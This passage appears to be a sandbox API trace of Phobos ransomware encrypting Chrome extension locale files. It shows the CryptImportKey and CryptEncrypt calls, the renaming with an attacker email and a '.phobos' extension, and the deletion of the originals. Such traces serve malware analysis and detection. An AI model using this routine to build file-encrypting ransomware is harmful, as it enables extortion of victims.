lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0153.252] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0153.252] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.252] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0153.253] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.253] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0153.253] CryptDestroyKey (hKey=0xa32c28) returned 1 [0153.253] CloseHandle (hObject=0x148) returned 1 [0153.253] CloseHandle (hObject=0x190) returned 1 [0153.253] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json")) returned 1 [0153.254] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.256] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=209) returned 1 [0153.256] CloseHandle (hObject=0x190) returned 1 [0153.256] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json")) returned 0x2020 [0153.256] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.256] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.256] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0153.257] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0153.257] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.257] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd1, lpOverlapped=0x0) returned 1 [0153.258] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0153.258] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0153.259] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0153.259] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.259] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0153.259] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.259] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0153.259] CryptDestroyKey (hKey=0xa32c28) returned 1 [0153.259] CloseHandle (hObject=0x190) returned 1 [0153.259] CloseHandle (hObject=0x148) returned 1 [0153.260] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json")) returned 1 [0153.261] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.301] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=213) returned 1 [0153.301] CloseHandle (hObject=0x190) returned 1 [0153.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json")) returned 0x2020 [0153.302] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.302] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.302] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0153.302] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0153.302] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.302] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd5, lpOverlapped=0x0) returned 1 [0153.303] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0153.304] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0153.305] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0153.305] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.305] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0153.305] CryptDestroyKey (hKey=0xa32968) returned 1 [0153.305] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0153.305] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.305] CloseHandle (hObject=0x190) returned 1 [0153.305] CloseHandle (hObject=0x188) returned 1 [0153.305] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json")) returned 1 [0153.306] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0153.307] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=216) returned 1 [0153.307] CloseHandle (hObject=0x188) returned 1 [0153.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json")) returned 0x2020 [0153.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0153.307] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.307] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.308] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0153.308] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.308] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd8, lpOverlapped=0x0) returned 1 [0153.314] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0153.314] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0153.315] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0153.315] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.315] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0153.315] CryptDestroyKey (hKey=0xa32968) returned 1 [0153.315] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0153.315] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.315] CloseHandle (hObject=0x188) returned 1 [0153.315] CloseHandle (hObject=0x190) returned 1 [0153.315] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json")) returned 1 [0153.316] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.317] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=266) returned 1 [0153.317] CloseHandle (hObject=0x190) returned 1 [0153.317] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json")) returned 0x2020 [0153.317] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.318] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.318] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0153.318] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0153.318] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.318] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10a, lpOverlapped=0x0) returned 1 [0153.320] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0153.320] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0153.321] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0153.321] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.321] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0153.321] CryptDestroyKey (hKey=0xa32968) returned 1 [0153.321] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0153.322] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.322] CloseHandle (hObject=0x190) returned 1 [0153.322] CloseHandle (hObject=0x188) returned 1 [0153.322] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json")) returned 1 [0153.323] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0153.324] 